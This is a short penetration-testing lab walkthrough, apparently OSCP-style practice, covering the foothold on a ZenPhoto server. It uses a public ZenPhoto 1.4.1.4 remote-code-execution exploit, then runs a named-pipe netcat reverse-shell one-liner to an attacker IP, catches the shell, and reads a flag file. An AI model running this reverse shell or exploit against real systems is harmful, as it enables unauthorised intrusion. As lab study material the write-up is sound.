Foothold
http://192.168.246.41/test/doc_files/zenphoto_database_quick_reference.pdf
❯ searchsploit -m 18083
Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
URL: https://www.exploit-db.com/exploits/18083
Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
Codes: OSVDB-76928, CVE-2011-4825
Verified: True
File Type: PHP script, ASCII text
Copied to: /home/adot/oscp/pg/zenphoto/18083.php
zenphoto-shell# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.239 1337 >/tmp/f
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.246.41] 56103
sh: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/local.txt
1e4c419fcf0820c46f16ee67b9c3198c
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:50:56:bf:90:85 brd ff:ff:ff:ff:ff:ff
inet 192.168.246.41/24 brd 192.168.246.255 scope global eth0
inet6 fe80::250:56ff:febf:9085/64 scope link
valid_lft forever preferred_lft forever